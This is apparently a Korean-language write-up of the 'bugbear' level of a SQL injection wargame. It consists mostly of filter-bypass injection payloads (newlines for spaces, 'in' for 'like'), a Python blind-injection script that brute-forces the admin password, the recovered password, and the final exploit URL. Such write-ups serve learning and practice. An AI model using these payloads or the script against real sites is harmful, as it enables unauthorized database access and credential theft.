bugbear

no - prob _ . () ' substr ascii = or and whitespace like 0x 필터링

pw - ' 필터링

 

 

1. pw 길이 알아내기

띄어쓰기 우회 -> %0a

'  우회 -> "

like 우회 -> in

 

?pw=a&no=0||id in ("admin") && length(pw) in (8)%23

?pw=a&no=0%7C%7C%0aid%0ain%0a("admin")%26%26length(pw)%0ain%0a(8)%23

 

 

2. pw 알아내기 

?pw=a&no=0%7C%7C%0aid%0ain%0a(%22admin%22)%0a%26%26%0aright(left(pw,{i}),1)%0ain%0a(char({c}))%23

import requests

password = ""
for i in range(1, 9):
    cookies = {"PHPSESSID":""}
    for c in range(48, 123):
        url = f"https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?pw=a&no=0%7C%7C%0aid%0ain%0a(%22admin%22)%0a%26%26%0aright(left(pw,{i}),1)%0ain%0a(char({c}))%23"
        res = requests.get(url, cookies=cookies)
        if "Hello admin" in res.text:
            password+=chr(c)
            print(password)
            break

52dc3991

 

3. 마지막 익스

?pw=52dc3991&no=0%7C%7Cid%0ain%0a(%22admin%22)%0a%26%26%0apw%0ain%0a(%2252dc3991%22)%23